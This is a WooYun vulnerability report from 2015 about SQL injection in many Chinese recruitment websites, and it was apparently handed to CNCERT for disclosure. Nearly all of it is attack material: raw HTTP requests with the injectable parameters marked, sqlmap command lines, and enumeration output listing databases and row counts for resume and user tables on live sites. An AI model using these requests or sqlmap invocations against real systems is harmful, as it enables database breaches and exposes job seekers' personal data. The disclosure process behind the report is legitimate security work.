
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0142175

Title: SQL injection in multiple recruitment websites (over a hundred million resumes exposed: ID card numbers, phone numbers, home addresses, ...)

Vendor: cncert

Author: 路人甲

Submitted: 2015-09-23 17:52

Fixed: 2015-11-09 17:04

Published: 2015-11-09 17:04

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-09-23: Details sent to the vendor; awaiting vendor action
2015-09-25: Vendor confirmed; details disclosed to the vendor only
2015-10-05: Details disclosed to core white hats and relevant domain experts
2015-10-15: Details disclosed to regular white hats
2015-10-25: Details disclosed to intern white hats
2015-11-09: Details disclosed to the public

Brief description:

Having said all this, I just want a Thunder (打雷)!!!
Thunder, please.

Detailed description:

Two sites built on shared platforms first.
Verified links; changing the Host and Referer headers is enough to reproduce it. There are many more.

[Screenshot: 2.png]


SQL injection in the resumeID parameter:

GET /jobseeker/ashx/AjaxValidationHandler.ashx?resumeID=1*&type=modifyResumeAccess&x=0.4393313731998205 HTTP/1.1
Host: **.**.**.**
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDACCBCDAR=CABNIFPBMJNPLDIGCEIPFMKK; ASP.NET_SessionId=2rpl2szvvqatmoojl5ttx0gm
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
available databases [15]:
[*] 2mdb
[*] 52hotdldb
[*] bptdb
[*] cptdb
[*] hospdb
[*] jrdb
[*] linyuedb
[*] master
[*] medejobdb
[*] model
[*] msdb
[*] myshipjobdb
[*] oiljobdb
[*] spadb
[*] tempdb
Changing the Host and Referer headers is all it takes.

POST /inc/pingjia.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 427
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDSQCRAQTQ=JNHNJHMCPANDIDJNGNPNBJKH
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=pjtj&f1=1&phone=555-666-0606&t1=%c7%d7%b0%ae%b5%c4%d3%c3%bb%a7%a3%ba%0d%0a%20%20%20%20%ce%d2%c3%c7%bb%e1%c3%bf%cc%ec%b9%d8%d7%a2%c4%fa%b5%c4%bd%a8%d2%e9%b2%a2%cc%e1%b9%a9%b7%b4%c0%a1%a3%ac%b2%bb%b6%cf%d3%c5%bb%af%b2%fa%c6%b7%a3%ac%ce%aa%c4%fa%b8%fc%ba%c3%b5%c4%b7%fe%ce%f1%a1%a3%0d%0a%20%20%20%20%c7%eb%c1%f4%cf%c2%c4%fa%cf%ea%cf%b8%b5%c4%bd%a8%d2%e9%a3%ac%d0%bb%d0%bb%a1%a3



+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.enterprise_accept | 23208901 |
| dbo.enter_down_resume_view | 4732184 |
| dbo.enterprise_cost_view | 3556574 |
| dbo.enter_accept_member | 2320124 |
| dbo.enter_inv_acc_view | 2284692 |
| dbo.ck_resume | 2283051 |
| dbo.ck_resume_cishu | 1941096 |
| dbo.ckresume_ehr_view | 1709990 |
| dbo.resume_information | 629481 |
| dbo.friend_dynamic | 611973 |
| dbo.art_view_list | 495933 |
| dbo.enter_down | 473491 |
| dbo.expo_ckjl | 455808 |
| dbo.TempQRCodes | 445620 |
| dbo.enterprise_cost | 356103 |
| dbo.enter_personal_cost_view | 354974 |
| dbo.enter_cost_view | 354946 |
| dbo.dy_zhoukan_email | 341978 |
| dbo.guzhu_hr_tp | 260633 |
| dbo.Weixin_Record | 219920 |
| dbo.enterprise_ck | 217024 |
| dbo.a_rec | 141802 |
| dbo.art_toupiaolist | 113656 |
| dbo.enterprise_log | 112773 |
| dbo.ehr_member_invite_view | 108253 |
| dbo.enter_invite_member | 108253 |
| dbo.gbook_about | 100889 |
| dbo.enterprise_section | 96307 |
| dbo.cfw_news | 91164 |
| dbo.cfw_news_typenameView | 90937 |
| **.**.**.**_user | 84004 |
| dbo.enter_operation_log | 83878 |
| **.**.**.**_word | 79906 |
| dbo.enterprise_member | 74278 |
| dbo.enter_fq | 72861 |
| dbo.enter_fq_view | 72860 |
| dbo.enterprise_talented_person | 71712 |
| dbo.enter_store_view | 71429 |
| dbo.enter_fq_admin_view | 70166 |
| dbo.enter_sms | 56164 |
| dbo.SM | 55235 |
| dbo.cfw_salary_all | 44497 |
| dbo.Desktop | 39382 |
| dbo.dy_zhoukan | 36676 |
| dbo.adv_click | 35044 |
| dbo.OptionName | 28267 |
| dbo.baihuolingshou | 27225 |
| dbo.fw_user | 24584 |
| **.**.**.**_tplist | 24270 |
| dbo.guzhu_meiti | 23000 |
| dbo.adv_home_bak | 21829 |
| dbo.blog | 21150 |
| dbo.adv_home_notnull_view | 18628 |
| dbo.adv_home_notnull_view_fb2 | 18628 |

POST /showme/searchOfShowme.do HTTP/1.1
Host: **.**.**.**
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: JSESSIONID=aaaVrVXLyBlQG6coh9l-u; isCookie=Tue Sep 15 17:13:04 CST 2015; schName=jdrbjpxu
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
homeTown=0&ID=0&jobFunction1=103000&jobLocation=0&keyWord=e*&location=0&mainCatalog=0&modType=search&reqAge1=18&reqAge2=18&reqDegreeID1=10&reqDegreeID2=10&reqSex=1&reqWorkYear1=-1&reqWorkYear2=-1&schoolName=e


Database: new_tourjob
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.My_WorkExp_Old | 622217 |
| dbo.查询 | 619303 |
| dbo.iResumeManage | 441462 |
| dbo.My_users | 441461 |
| dbo.Mem_Position | 110900 |
| dbo.pub_History | 100365 |
| dbo.memberInviteResume | 100364 |
| dbo.memberRecevResume | 100364 |
| dbo.Mem_Info | 21272 |
| dbo.Mem_Rights | 21272 |
| dbo.Mem_account | 21271 |
| dbo.memberRightAccount | 21271 |
| dbo.memberRightAccount | 21271 |
| dbo.Pwd_20150515 | 20880 |
| dbo.Position_VindicateLog | 12345 |

POST /Register/reg_sec.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 262
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDCQDCSBRA=BHKAKKLCPLCDMOOHHAMFHDJI
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Address=3137%20Laguna%20Street&City=San%20Francisco&Connector=1&HajaYaXaHa4a2ajafW=1&mainVocation=1&memberType=1&Province=NY&subVocation=1&Telephone=555-666-0606&vuPass=g00dPa%24%24w0rD&XaDa2a4aSagafW=c7RH3W8g*&Xasa4a1a1afW=1


Database: para360
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| dbo.crm_InfoLog | 11492516 |
| dbo.del_ProductSupply | 7046973 |
| dbo.log_UserPoint | 4203732 |
| dbo.log_SysSvr | 3865826 |
| dbo.syncobj_0x3737353642383242 | 2747544 |
| dbo.syncobj_0x3739334644423337 | 2747544 |
| dbo.syncobj_0x4230323931443339 | 2747544 |
| dbo.syncobj_0x4343343242423141 | 2747544 |
| dbo.syncobj_0x3939414643463232 | 2467358 |
| dbo.syncobj_0x3333323636314639 | 2467357 |
| dbo.syncobj_0x3436463136364643 | 1576805 |
| dbo.syncobj_0x3535353537383430 | 1576805 |
| dbo.syncobj_0x3545354139453245 | 1576805 |
| dbo.syncobj_0x4135343931413643 | 1576805 |
| dbo.syncobj_0x3437333944353033 | 1550133 |
| dbo.syncobj_0x3645303332464244 | 1550133 |
| dbo.syncobj_0x3735444443363741 | 1550133 |
| dbo.syncobj_0x3345444637453339 | 1455899 |
| dbo.syncobj_0x3739374443413737 | 1455899 |
| dbo.syncobj_0x3739343843333337 | 634001 |
| dbo.syncobj_0x3245453043373030 | 634000 |
| dbo.syncobj_0x3334383544313241 | 634000 |
| dbo.syncobj_0x3242463638343134 | 502393 |
| dbo.syncobj_0x3538333646453836 | 502393 |
| dbo.syncobj_0x4330344142304435 | 502393 |
| dbo.syncobj_0x3333434335443135 | 428039 |
| dbo.syncobj_0x4131364238414345 | 428039 |
| dbo.syncobj_0x4244384135373645 | 341483 |
| dbo.syncobj_0x3035433345453638 | 341482 |
| dbo.syncobj_0x3131423630434346 | 341482 |
| dbo.syncobj_0x3637463633463632 | 341482 |
| dbo.crm_OperLog | 275406 |
| dbo.syncobj_0x4437434233353834 | 246735 |
| dbo.log_DelUser | 204279 |
| dbo.del_UserID_EnterpriseB | 188547 |
| dbo.del_UserID_EnterpriseEx | 182109 |
| dbo.syncobj_0x3034454337364241 | 169134 |
| dbo.syncobj_0x3939323241344138 | 169134 |
| dbo.syncobj_0x4143363743304141 | 169134 |
| dbo.log_GetWorderID | 115795 |
| dbo.syncobj_0x3337354541454144 | 95694 |
| dbo.syncobj_0x3444354438423236 | 72554 |
| dbo.syncobj_0x3632383932443141 | 72554 |
| dbo.syncobj_0x3746333033453131 | 72554 |
| dbo.crm_Contact | 61103 |
| dbo.log_ICLogin | 45706 |
| dbo.syncobj_0x3130443343313242 | 45162 |
| dbo.syncobj_0x3133334145433333 | 45162 |
| dbo.del_ProductBuy | 38967 |
| dbo.syncobj_0x3637414546443845 | 30769 |
| dbo.syncobj_0x3932383236354646 | 30769 |
| dbo.syncobj_0x3537303242423645 | 21612 |
| dbo.syncobj_0x3846453139323733 | 21612 |
| dbo.syncobj_0x4331424244424646 | 21612 |
| dbo.syncobj_0x3032344234444639 | 15240 |
| dbo.syncobj_0x4243444134463430 | 15240 |
| dbo.syncobj_0x4334394533363846 | 15240 |
| dbo.Web_UserTemp | 13821 |
**.**.**.**/jobseeker/stage/FAQ_Question.aspx?id=12
**.**.**.**/jobseeker/stage/FAQ_Question.aspx?class=6

[Screenshot: 3.png]


POST /inc/pingjia.asp HTTP/1.1
Host: **.**.**.**
Content-Length: 427
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDSQCRAQTQ=JNHNJHMCPANDIDJNGNPNBJKH
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
action=pjtj&f1=*&phone=555-666-0606&t1=%c7%d7%b0%ae%b5%c4%d3%c3%bb%a7%a3%ba%0d%0a%20%20%20%20%ce%d2%c3%c7%bb%e1%c3%bf%cc%ec%b9%d8%d7%a2%c4%fa%b5%c4%bd%a8%d2%e9%b2%a2%cc%e1%b9%a9%b7%b4%c0%a1%a3%ac%b2%bb%b6%cf%d3%c5%bb%af%b2%fa%c6%b7%a3%ac%ce%aa%c4%fa%b8%fc%ba%c3%b5%c4%b7%fe%ce%f1%a1%a3%0d%0a%20%20%20%20%c7%eb%c1%f4%cf%c2%c4%fa%cf%ea%cf%b8%b5%c4%bd%a8%d2%e9%a3%ac%d0%bb%d0%bb%a1%a3
GET /adclick.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
X-Forwarded-For: DDCIz8th*
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: ASPSESSIONIDCASDQADD=NDBJIGMDIOLFCLBEBACEAMGH; safedog-flow-item=604A3B11CE68A798B5D8E076B24238AA; adminpersonid=jyd%2Cjackchiao%2Czhangtaotao%2CCherry333%2C; cIP=122%2E11%2E37%2E59; adminposition=%27394%27%2C
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*
available databases [9]:
[*] **.**.**.**
[*] **.**.**.**
[*] cp.**.**.**.**
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
Database: **.**.**.**
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.FkInfo | 9504049 |
| dbo.V_scoreDetial | 2229015 |
| dbo.ViewRestriction | 919876 |
| dbo.perdcb | 765112 |
| dbo.help | 587096 |
| dbo.Sms_warn | 566882 |
| dbo.admin_view_log | 549797 |
| dbo.CompanyCount | 445714 |
| dbo.PutResume | 303573 |
| dbo.InviteFace | 216081 |
| dbo.VIEW_face | 215914 |
| dbo.View_PersonExpAll | 186019 |
| dbo.PersonDegree | 159320 |
| dbo.Person | 157237 |
| dbo.ClientMsg | 108533 |
| dbo.laiyuan | 95868 |
| dbo.Illegal | 91836 |
| dbo.MyVote | 89440 |
| dbo.KeyWords | 88020 |
| dbo.PersonExp | 86903 |
| dbo.Client | 62734 |
| dbo.PersonBase | 61529 |
| dbo.KeyWord | 54969 |
| dbo.adclick | 50783 |
| dbo.VIEW_com_hy | 49414 |
| dbo.Sms_Set | 28452 |
| dbo.WorkSite | 19695 |
| **.**.**.**dcb | 16804 |
| dbo.itemcost | 14016 |
| dbo.Lb_comment | 9150 |
| dbo.Company | 8995 |
| dbo.QQAPI | 8717 |
| dbo.TX_Sms | 7563 |
| dbo.WosVote | 6886 |
| dbo.onLine | 6211 |
| dbo.Sms_pay | 5981 |
| dbo.V_jiaofei | 5783 |
| dbo.Orders | 5414 |
| dbo.guest | 5394 |
| **.**.**.**_largess | 4527 |
| dbo.baoguang | 3972 |
| dbo.key_lib | 3944 |
| dbo.eight | 3101 |
| dbo.invoice | 3099 |
| dbo.CompanyImg | 2870 |
| dbo.Grade | 2636 |
| dbo.Login_Sms | 2333 |
| dbo.ClientChat | 1628 |
| dbo.credit | 1550 |
| dbo.CompanySus | 1493 |
| dbo.CP_Point | 1284 |
| dbo.CP_WS_VIEW | 1087 |
| dbo.SignUp | 887 |
桂聘人才网 (Guipin recruitment site): **.**.**.**

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 548
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=bqsemnqy&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxZGRoxRJEl%2beh46Js34/3QHajtXyNmA%3d%3d


南宁人才网 (Nanning recruitment site): http://**.**.**.**/

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: JobViewCount=/job/818209-153003.html; userHabit_temp=userFrom=/job/818209-153003.html; ASP.NET_SessionId=21gkizvz1l000m2w3ktefu2b; CorpJob=%257c1%257c1%257c-1%257c-1%257c284%257c%257c%257c1%257c1%257c-1; InfoViewCount=/info/2013_01/04_14/3317.html; ResumeViewCount=/859850.html; AdletJob=%257c-1%257c284
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d


Third instance: http://**.**.**.**/

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d


北海人才网 (Beihai recruitment site)
**.**.**.**

POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d
http://**.**.**.**/
POST /AjaxRequest/PostSimpleRegist.aspx HTTP/1.1
Host: **.**.**.**
Content-Length: 702
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Btn=1&lUserAge=agpkkkkc&lUserName=*&lUserPhone=%e4%bc%81%e4%b8%9a%e4%bc%9a%e9%80%9a%e8%bf%87%e6%ad%a4%e5%8f%b7%e7%a0%81%e8%81%94%e7%b3%bb%e4%bd%a0&lUserSex=male&lUserText=%e8%af%b4%e8%af%b4%e4%bd%a0%e7%9a%84%e4%bc%98%e5%8a%bf%ef%bc%8c%e6%88%96%e8%80%85%e7%ae%80%e8%bf%b0%e4%b9%8b%e5%89%8d%e7%9a%84%e5%b7%a5%e4%bd%9c%e7%bb%8f%e9%aa%8c%ef%bc%8c%e5%8f%af%e5%a4%a7%e5%a4%a7%e6%8f%90%e5%8d%87%e9%9d%a2%e8%af%95%e5%87%a0%e7%8e%87%ef%bc%81&__VIEWSTATE=/wEPDwUJMjc1NTk3NjgxD2QWAgIDD2QWDAINDw8WAh4EVGV4dAUHODc3MjMzM2RkAg8PDxYCHwAFBjIwMDkyM2RkAhEPDxYCHwAFAzQ0OWRkAhMPDxYCHwBlZGQCFQ8PFgIfAAUDOTIxZGQCFw8PFgIfAAUP5YaZ5a2X5qW85YmN5Y%2bwZGRkNKcdtIvKgqGJHAiP0uh82IrB0oo%3d


Proof of vulnerability:

C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/company/prodetail.php?id=29325&company_id=63328" -p "id" -D sq_chinamrong --tables --count
Database: sq_chinamrong
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| cdb_members | 912179 |
| member | 911576 |
| trade_leads | 327541 |
| company | 213190 |
| cdb_uc_memberfields | 154887 |
| cdb_uc_members | 154884 |
| member_log | 108934 |
| cdb_memberfields | 106433 |
| cdb_memberspaces | 56251 |
| cdb_spacecaches | 37604 |
| trade_contact | 36038 |
| product_msg | 26703 |
| cdb_posts | 24868 |
| news | 22476 |
| sales_keyword | 16678 |
| trade_keyword | 12035 |
| cdb_uc_mergemembers | 9999 |
C:\Python27\sqlmap>sqlmap.py -u "**.**.**.**/jobseeker/stage/FAQ_Question.aspx?id=12" -D medejobdb --tables --count
Database: medejobdb
+-----------------------------------------+---------+
| Table | Entries |
+-----------------------------------------+---------+
| dbo.Experience | 150719 |
| dbo.Intention | 109221 |
| dbo.VIEW_QUERYRESUME | 99492 |
| dbo.JobseekerUser | 95926 |
| dbo.Education | 92952 |
| dbo.view_resume | 84956 |
| dbo.Resume | 84868 |
| dbo.view_resumeUnionju | 84863 |
| dbo.Position | 53224 |
| dbo.View_DepartPosList | 53224 |
| dbo.VIEW_POSITION | 51442 |
| dbo.CompanyStat | 35116 |
| dbo.VIEW_COMPANYSTAT | 34971 |
| dbo.Baidu_xml | 31801 |
| dbo.Temp_ImportResume | 30737 |
**.**.**.**/addMessage.do?id=8a28897b42078619014208c9bc9a0dc0&mailType=1&siteId=g*&type=0
Database: zzrcjob
+------------------------------------+---------+
| Table | Entries |
+------------------------------------+---------+
| dbo.ZZRC_ARCHIVES | 345582 |
| dbo.YJY_ENCRYPTIONLOG | 166653 |
| dbo.YJY_LOG | 62987 |
| dbo.ZZRC_PERSONAL | 52746 |
| dbo.YJY_INFOMAPHITCOUNTER | 27210 |
| dbo.ZZRC_ZQZ_RESULT | 19524 |
| dbo.ZZRC_PERSON_LOG | 18135 |
**.**.**.**/Handler/Company.ashx?action=getTypeT&id=1*
**.**.**.**/Handler/index.ashx?action=GetPostJobList&id=1*
Database: BPMS_OA
+---------------------------------+---------+
| Table | Entries |
+---------------------------------+---------+
| dbo.BPMS_SysLogDetails | 28512725 |
| dbo.sys_AssCount | 11238631 |
| dbo.gr_browsecount | 7474553 |
| dbo.BPMS_SysLogs | 5068655 |
| dbo.user_platform | 3756592 |
| dbo.sys_AssPos | 3734739 |
| dbo.HuoDong | 2647007 |
| dbo.OA_history | 1722208 |
| dbo._dta_mv_102 | 1192857 |
| dbo._dta_mv_38 | 1192857 |
| dbo.gr_pos_viewcount | 1156439 |
| dbo.gr_search | 971523 |
| dbo.HR_Offer | 773733 |
| dbo.gr_user | 709071 |
| dbo.HR_PeopleInfo | 646892 |
| dbo.gr_resume | 491198 |
| dbo.visitTable | 484991 |
| dbo.gr_company | 358867 |
| dbo._dta_mv_0 | 322868 |
| dbo._dta_mv_1 | 322868 |
| dbo.gr_LoginList | 269936 |
| dbo.MobileAddress | 263017 |
| dbo.Com_Cooperation | 214467 |
| dbo.user_sort | 193427 |
| dbo.Resume_Name | 154727 |
| dbo.gr_resume_folder | 153666 |
| dbo._dta_mv_9 | 153608 |
| dbo._dta_mv_5 | 149901 |
| dbo._dta_mv_85 | 148085 |
| dbo.OA_CallStatus | 143955 |
| dbo._dta_mv_12 | 143841 |
| dbo._dta_mv_13 | 143841 |
| dbo._dta_mv_6 | 143801 |
| dbo._dta_mv_7 | 143801 |
| dbo._dta_mv_21 | 143105 |
| dbo._dta_mv_86 | 143105 |
| dbo._dta_mv_34 | 138760 |
| dbo._dta_mv_99 | 138760 |
| dbo.OA_Salary | 85120 |
| dbo._dta_mv_105 | 83082 |
| dbo._dta_mv_41 | 83082 |
| dbo._dta_mv_106 | 82710 |
| dbo._dta_mv_42 | 82710 |
| dbo._dta_mv_22 | 82464 |
| dbo._dta_mv_87 | 82464 |
| dbo.BPMS_SysLoginLog | 82153 |
| dbo._dta_mv_11 | 80860 |
| dbo._dta_mv_3 | 80837 |
| dbo.gr_res_val | 80158 |
| **.**.**.**Panytemp | 71799 |
| dbo._dta_mv_14 | 69112 |
| dbo._dta_mv_8 | 69083 |
| dbo.gr_resume_visit | 68651 |
| dbo._dta_mv_4 | 67720 |
| dbo._dta_mv_23 | 66986 |
| dbo._dta_mv_88 | 66986 |
| dbo.gr_action | 56663 |
| dbo.AppVisitList | 56003 |
| dbo.BPMS_DownloadAss | 45910 |
| dbo._dta_mv_100 | 43413 |
| dbo._dta_mv_35 | 43413 |
| dbo.resume_dynamic | 40249 |
| dbo.Journal | 39668 |
| dbo.sys_area | 38592 |
| dbo.gr_experience | 37688 |
| dbo.KPI | 37631 |
| dbo._dta_mv_10 | 37250 |
| dbo._dta_mv_2 | 37242 |
| dbo.score_history | 31728 |
| dbo.gr_Integral | 24149 |
| dbo.gr_comremark | 24074 |
| dbo.Com_History | 20833 |
| dbo.OA_user_face | 17176 |
| dbo.OA_user_face_time | 17012 |
| dbo._dta_mv_121 | 16688 |
| dbo._dta_mv_61 | 16688 |
| dbo.BaiduItem | 15881 |
| dbo._dta_mv_133 | 15381 |
| dbo._dta_mv_73 | 15381 |
| dbo.gr_position | 15015 |
| dbo._dta_mv_28 | 14989 |
| dbo._dta_mv_30 | 14989 |
| dbo._dta_mv_93 | 14989 |
| dbo._dta_mv_95 | 14989 |
| dbo._dta_mv_122 | 14981 |
| dbo._dta_mv_62 | 14981 |
| dbo.gr_PinBi | 14569 |
| dbo._dta_mv_127 | 13131 |
| dbo._dta_mv_129 | 13131 |
| dbo._dta_mv_67 | 13131 |
| dbo._dta_mv_69 | 13131 |
| dbo.OA_Contract_bak | 13068 |
| dbo.OA_Contract | 13067 |
| dbo.sys_LBSinfo | 12014 |
| dbo._dta_mv_119 | 11152 |
| dbo._dta_mv_59 | 11152 |
http://**.**.**.**/zdyj/zdnew.asp?ai_length=42&ai_rows=9&n=0.3907799569424242&newtype=*
Database: xarc_web
+---------------------------+---------+
| Table | Entries |
+---------------------------+---------+
| dbo.RC_MYBAG | 824671 |
| dbo.RC_RCINFO | 457456 |
| dbo.member_loginlog | 390276 |
| dbo.MEMBER_DOWNLOADRESUME | 350849 |
| dbo.ZP_DWRCBAG | 337252 |
| dbo.RC_APPLYJOB | 279200 |
| dbo.ZP_DWRECEIVEDLETTER | 231249 |
| dbo.ZP_MEMBERZP | 161298 |
| dbo.ZP_DWINFO | 67416 |
